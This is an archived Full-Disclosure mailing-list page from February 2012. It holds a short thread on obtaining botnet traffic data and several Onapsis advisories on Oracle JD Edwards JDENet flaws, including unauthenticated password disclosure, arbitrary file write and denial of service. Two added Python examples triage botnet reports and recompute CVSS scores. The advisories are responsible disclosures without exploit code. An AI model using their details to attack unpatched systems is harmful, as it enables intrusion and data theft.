Re: [Full-disclosure] Botnet Traffic

2012-02-23 Thread Derek Grocke
Hi James,

I've found that using the Shadow Server network/ASN reports is very useful,
depending on what analysis you are trying to do.

http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork

I.e.
 - Detected Botnet Command and Control servers
 - Infected systems (drones)
 - DDoS attacks (source and victim)
 - Scans
 - Clickfraud
 - Compromised hosts
 - Proxies
 - Spam relays
 - Malicious software droppers and other related information.

You could always create your own honeypot and/or partner with one of the
carriers/ISP's to get live data.


Thanks
Derek

On 24/02/2012, at 8:51 AM, James Smith wrote:

Hello,

Can anyone on this list provide botnet network traffic for analysis, or
IPs which have been infected?
-- 
Sincerely;


James Smith
CEO, CEH, Security Analyst
Email: ja...@smithwaysecurity.com
Phone: 1877-760-1953
Website: www.SmithwaySecurity.com


CONFIDENTIALITY NOTICE: This communication with its contents may contain
confidential and/or legally privileged information. It is solely for the
use of the intended recipient(s). Unauthorized interception, review, use or
disclosure is prohibited and may violate applicable laws including the
Electronic Communications Privacy Act. If you are not the intended
recipient, please contact the sender and destroy all copies of the
communication.

- This communication is confidential to the parties it was intended to
serve -

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
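A worked example of the triage such a report feeds, added here and not part of Derek's reply or of Shadowserver's own tooling: it reads a constructed, simplified CSV (the real report schema is not reproduced; the column names, the prefixes and the addresses are assumptions), keeps only the rows that fall inside the prefixes you operate, and produces a per-host summary plus an egress deny list of the C2 endpoints those hosts were seen contacting.

```python
"""Triage a botnet 'drone' report against the address space you operate.

Added example, not part of the original thread and not Shadowserver's own tooling.
The CSV layout below is a constructed, simplified stand-in (real Shadowserver
reports carry more columns under their own header names), so remap the column
names before running this against a real report.
"""
import csv
import io
import ipaddress
from collections import Counter, defaultdict

# Constructed sample report using documentation-range addresses.
SAMPLE_REPORT = """timestamp,ip,asn,infection,cc_ip,cc_port
2012-02-23 01:12:04,198.51.100.23,64500,zeus,203.0.113.9,8080
2012-02-23 01:12:09,198.51.100.23,64500,zeus,203.0.113.9,8080
2012-02-23 01:15:41,198.51.100.77,64500,conficker,203.0.113.44,80
2012-02-23 02:02:13,192.0.2.200,64501,zeus,203.0.113.9,8080
2012-02-23 02:30:00,198.51.100.5,64500,spyeye,203.0.113.120,443
"""

# Assumed: the prefixes we are responsible for; rows outside them belong to someone else.
OUR_PREFIXES = [ipaddress.ip_network("198.51.100.0/24")]


def triage(report_text, prefixes=OUR_PREFIXES):
    """Return (hosts, families, c2) for the report rows that fall inside our prefixes.

    hosts    : ip -> {"first_seen", "last_seen", "hits", "families"}
    families : Counter of malware family -> number of distinct infected hosts
    c2       : set of (cc_ip, cc_port) our hosts were observed contacting
    """
    hosts = defaultdict(lambda: {"first_seen": None, "last_seen": None,
                                 "hits": 0, "families": set()})
    c2 = set()
    for row in csv.DictReader(io.StringIO(report_text)):
        addr = ipaddress.ip_address(row["ip"])
        if not any(addr in net for net in prefixes):
            continue  # not our address space
        h = hosts[row["ip"]]
        h["hits"] += 1
        h["families"].add(row["infection"])
        seen = [t for t in (h["first_seen"], h["last_seen"], row["timestamp"]) if t]
        h["first_seen"], h["last_seen"] = min(seen), max(seen)
        c2.add((row["cc_ip"], int(row["cc_port"])))
    families = Counter(f for h in hosts.values() for f in h["families"])
    return dict(hosts), families, c2


def block_list(c2):
    """Egress-deny entries for the observed C2 endpoints, one 'ip:port' per line."""
    return sorted(f"{ip}:{port}" for ip, port in c2)


if __name__ == "__main__":
    hosts, families, c2 = triage(SAMPLE_REPORT)
    for ip, h in sorted(hosts.items()):
        print(f"{ip}: {h['hits']} hit(s), {sorted(h['families'])}, "
              f"{h['first_seen']} .. {h['last_seen']}")
    print("families:", dict(families))
    print("egress deny:", block_list(c2))
```

The row for 192.0.2.200 is dropped because it is outside the assumed prefix; the two zeus rows for 198.51.100.23 collapse into one host with two hits, which is the unit you actually open a ticket on.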

[Full-disclosure] [Onapsis Security Advisory 2012-02] Oracle JD Edwards Security Kernel Remote Password Disclosure

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards Security Kernel Remote Password 
Disclosure

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business information processed by the
ERP system.
This would result in the total compromise of the ERP infrastructure.

2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-02

- --Onapsis SVS ID: ONAPSIS-00026

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:   CVE-2011-2325

- --Initial Base CVSS v2:  10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Information Disclosure.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-02


4. Affected Components Description
==

JDENet is the network communication middleware that handles workstation-to-server 
and server-to-server communications. It is used to call remote functions, to
authenticate users and to transmit information between hosts in a JD Edwards 
environment.

5. Vulnerability Details
===

If a specially crafted packet is sent to the JDENet Service (6015 TCP by 
default), and the Security Kernel is enabled and SignonSecurity is
configured, then it is possible to retrieve the password of arbitrary users.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
=
* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global customers against espionage, sabotage and financial
fraud threats.

Onapsis X1, the company's flagship product, is the industry's first 
comprehensive solution for the automated security assessment of SAP platforms.
Being the first and only SAP-certified solution of its kind, Onapsis X1 allows 
customers to perform automated Vulnerability Assessments, Security &
Compliance Audits and Penetration Tests over their entire SAP platform.

Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & 
ERP security experts who

[Full-disclosure] [Onapsis Security Advisory 2012-01] Oracle JD Edwards JDENET Arbitrary File Write

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards JDENET Arbitrary File Write

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business information processed by the
ERP system.
This would result in the total compromise of the ERP infrastructure.

2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-01

- --Onapsis SVS ID: ONAPSIS-00017

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:  CVE-2011-2317

- --Initial Base CVSS v2:  9.7 (AV:N/AC:L/Au:N/C:P/I:C/A:C)


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Arbitrary File Write.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-01


4. Affected Components Description
==

JDENet is the network communication middleware that handles workstation-to-server 
and server-to-server communications. It is used to call remote functions, to
authenticate users and to transmit information between hosts in a JD Edwards 
environment.

5. Vulnerability Details
===

If a “Message packet” is sent to the JDENet port (6015 by default) containing a 
specially crafted “File Packet”, the sent file is saved in the server
where the JDENet service is running, in the arbitrary location specified by the 
“File Packet”.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.


6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global customers against espionage, sabotage and financial
fraud threats.

Onapsis X1, the company's flagship product, is the industry's first 
comprehensive solution for the automated security assessment of SAP platforms.
Being the first and only SAP-certified solution of its kind, Onapsis X1 allows 
customers to perform automated Vulnerability Assessments, Security &
Compliance Audits and Penetration Tests over their entire SAP platform.

Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & 
ERP security

[Full-disclosure] [Onapsis Security Advisory 2012-08] Oracle JD Edwards Security Kernel Information Disclosure

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards Security Kernel Information 
Disclosure

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to validate user credentials used to access the ERP system.
This would provide valuable information for more complex attacks against the 
ERP system.


2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-08

- --Onapsis SVS ID: ONAPSIS-00027

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:   CVE-2011-2326

- --Initial Base CVSS v2:  3.9 
(AV:N/AC:L/Au:N/C:P/I:N/A:N/CDP:ND/TD:ND/CR:L/IR:ND/AR:ND)

Note that this vector carries environmental metrics: 3.9 is the score with the 
CR:L confidentiality requirement applied, while the base metrics alone
(AV:N/AC:L/Au:N/C:P/I:N/A:N) score 5.0 under CVSS v2.


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Information Disclosure.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-08


4. Affected Components Description
==

JDENet is the network communication middleware that handles workstation-to-server 
and server-to-server communications. It is used to call remote functions, to
authenticate users and to transmit information between hosts in a JD Edwards 
environment.

5. Vulnerability Details
===

If a specially crafted packet is sent to the JDENet Service (6015 TCP by 
default), then it would be possible to validate arbitrary (USER, ROLE,
ENVIRONMENT) tuples, in order to detect valid ones.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global customers against espionage, sabotage and financial
fraud threats.

Onapsis X1, the company's flagship product, is the industry's first 
comprehensive solution for the automated security assessment of SAP platforms.
Being the first and only SAP-certified solution of its kind, Onapsis X1 allows 
customers to perform automated Vulnerability Assessments, Security &
Compliance Audits and Penetration Tests over their entire SAP platform.

Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & 
ERP security ex
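The scores quoted in these Onapsis advisories can be checked rather than taken on trust. The following is an added example, not part of any advisory: a CVSS v2 base and environmental calculator using the standard v2 weights, with the vectors copied from the advisories on this page. It reproduces 10.0, 9.7, 7.8 and 4.3 for the plain base vectors, and shows that the 3.9 given for ONAPSIS-2012-08 is what you get once the CR:L environmental metric in that vector is applied, the base metrics alone scoring 5.0.

```python
"""CVSS v2 scoring, used here to recompute the scores quoted in the Onapsis advisories.

Added example (not from the advisories). The metric weights and formulas are the
CVSS v2 ones; the advisory IDs and vectors below are copied from this page.
"""
import math

# CVSS v2 base metric weights.
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}
# Temporal weights ("ND" = not defined, neutral).
E = {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0}
RL = {"OF": 0.87, "TF": 0.9, "W": 0.95, "U": 1.0, "ND": 1.0}
RC = {"UC": 0.9, "UR": 0.95, "C": 1.0, "ND": 1.0}
# Environmental weights.
CDP = {"N": 0.0, "L": 0.1, "LM": 0.3, "MH": 0.4, "H": 0.5, "ND": 0.0}
TD = {"N": 0.0, "L": 0.25, "M": 0.75, "H": 1.0, "ND": 1.0}
REQ = {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0}  # CR / IR / AR

# Vectors exactly as quoted in the advisories on this page.
ADVISORY_VECTORS = {
    "ONAPSIS-2012-02": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
    "ONAPSIS-2012-01": "AV:N/AC:L/Au:N/C:P/I:C/A:C",
    "ONAPSIS-2012-08": "AV:N/AC:L/Au:N/C:P/I:N/A:N/CDP:ND/TD:ND/CR:L/IR:ND/AR:ND",
    "ONAPSIS-2012-06": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
    "ONAPSIS-2012-05": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
}


def _round1(x):
    """CVSS v2 rounds half-up to one decimal place."""
    return math.floor(x * 10 + 0.5) / 10


def parse_vector(vector):
    return dict(part.split(":", 1) for part in vector.split("/"))


def _exploitability(m):
    return 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]


def _impact(m, cr=1.0, ir=1.0, ar=1.0):
    c, i, a = CIA[m["C"]] * cr, CIA[m["I"]] * ir, CIA[m["A"]] * ar
    return 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))


def _base_from(impact, exploitability):
    f = 0.0 if impact == 0 else 1.176
    return _round1((0.6 * impact + 0.4 * exploitability - 1.5) * f)


def base_score(vector):
    m = parse_vector(vector)
    return _base_from(_impact(m), _exploitability(m))


def environmental_score(vector):
    """Environmental score; temporal/environmental metrics absent from the vector count as ND."""
    m = parse_vector(vector)

    def g(key):
        return m.get(key, "ND")

    adj_impact = min(10.0, _impact(m, REQ[g("CR")], REQ[g("IR")], REQ[g("AR")]))
    adj_base = _base_from(adj_impact, _exploitability(m))
    adj_temporal = _round1(adj_base * E[g("E")] * RL[g("RL")] * RC[g("RC")])
    return _round1((adj_temporal + (10 - adj_temporal) * CDP[g("CDP")]) * TD[g("TD")])


def score(vector):
    """(base, environmental or None): environmental only if the vector carries those metrics."""
    m = parse_vector(vector)
    has_env = any(k in m for k in ("CDP", "TD", "CR", "IR", "AR"))
    return base_score(vector), (environmental_score(vector) if has_env else None)


if __name__ == "__main__":
    for adv, vec in ADVISORY_VECTORS.items():
        print(adv, vec, score(vec))
```

When you prioritise patching from a vendor's number, make sure you know which of the three CVSS scores it is: an environmental score already bakes in one organisation's requirement ratings, and yours may differ.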

[Full-disclosure] [Onapsis Security Advisory 2012-07] Oracle JD Edwards SawKernel SET_INI Configuration Modification

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards SawKernel SET_INI Configuration 
Modification

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business information processed by the
ERP system.
This would result in the total compromise of the ERP infrastructure.


2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-07

- --Onapsis SVS ID: ONAPSIS-00032

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:   CVE-2011-3514

- --Initial Base CVSS v2:  10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Configuration Modification.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-07


4. Affected Components Description
==

“The next kernel in the JDE.INI file is the Server Administration Workbench 
(SAW) kernel. This kernel is responsible for collecting and reporting
information about the kernels in EnterpriseOne. The SAW kernel will connect to 
each of the kernels to determine information including:

- Number of users connected to the kernel (if applicable)
- Number of requests processes by the kernel
- Average time to complete the request
- Outstanding requests
- Users connected to the kernel process (if applicable)

This information is displayed in the SAW or Server Manager applications. This 
is critical to monitoring the health of the EnterpriseOne kernels and
providing a view into how the system is executing.” JD Edwards EnterpriseOne: 
The Complete Reference. Copyright © 2009 by The McGraw-Hill Companies


5. Vulnerability Details
===

If a specially crafted message is sent to the JDENET service (specifically to 
the SAW kernel), a remote user can change the JDE.INI configuration file.
This could let an attacker perform more complex attacks leading to a full 
compromise of the system.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP securit

[Full-disclosure] [Onapsis Security Advisory 2012-06] Oracle JD Edwards JDENET Large Packets Denial of Service

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards JDENET Large Packets Denial of 
Service

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might 
trigger a denial of service on the JDENET service.
This would result in the unavailability of most of the ERP services.

2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-06

- --Onapsis SVS ID: ONAPSIS-00023

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:   CVE-2011-2324

- --Initial Base CVSS v2:  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Denial of Service.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-06


4. Affected Components Description
==

JDENet is the network communication middleware that handles workstation-to-server 
and server-to-server communications. It is used to call remote functions, to
authenticate users and to transmit information between hosts in a JD Edwards 
environment.

5. Vulnerability Details
===

If a message containing packets of a specific size is sent to the JDENET 
service, a Denial of service condition is triggered, because the kernel in
charge of dispatching those packets uses all the available CPU time.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global customers against espionage, sabotage and financial
fraud threats.

Onapsis X1, the company's flagship product, is the industry's first 
comprehensive solution for the automated security assessment of SAP platforms.
Being the first and only SAP-certified solution of its kind, Onapsis X1 allows 
customers to perform automated Vulnerability Assessments, Security &
Compliance Audits and Penetration Tests over their entire SAP platform.

Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & 
ERP security experts who are continuously invited to lecture at the
lead

[Full-disclosure] [Onapsis Security Advisory 2012-05] Oracle JD Edwards JDENET Multiple Information Disclosure

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards JDENET Multiple Information 
Disclosure

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access technical information about the ERP system.
This might result in the disclosure of technical information that could be 
useful in further attacks against the ERP infrastructure.

2. Advisory Information
===

- --Release Date: 2012-02-23

- --Last Revised: 2012-02-21

- --Security Advisory ID: ONAPSIS-2012-05

- --Onapsis SVS ID: ONAPSIS-00021

- --Researcher: Juan Pablo Perez Etchegoyen

- --CVE:   CVE-2011-2321

- --Initial Base CVSS v2:  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)


3. Vulnerability Information
===

- --Vendor: ORACLE

- --Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

- --Vulnerability Class: Information Disclosure.

- --Remotely Exploitable: Yes

- --Locally Exploitable: No

- --Authentication Required: No

- --Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-05


4. Affected Components Description
==

JDENet is the network communication middleware that handles workstation-to-server 
and server-to-server communications. It is used to call remote functions, to
authenticate users and to transmit information between hosts in a JD Edwards 
environment.

5. Vulnerability Details
===

The JDENET service exposes several ways to gather information. By sending 
specific types of messages, it is possible to access technical information
about the system's configuration, such as:

* Kernel Process ID.
* Kernel processes.
* Kernel processes information.
* JDENET process information.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch
their systems and protect against the exploitation of the described 
vulnerability.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.



About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved
in this special team lead the public research trends in this matter, having 
discovered and published many of the public security vulnerabilities in
these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global customers against espionage, sabotage and financial
fraud threats.

Onapsis X1, the company's flagship product, is the industry's first 
comprehensive solution for the automated security assessment of SAP platforms.
Being the first and only SAP-certified solution of its kind, Onapsis X1 allows 
customers to perform automated Vulnerability Assessments, Security &
Compliance Audits and Penetration T

[Full-disclosure] [Onapsis Security Advisory 2012-04] Oracle JD Edwards SawKernel GET_INI Information Disclosure

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards SawKernel GET_INI Information 
Disclosure

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
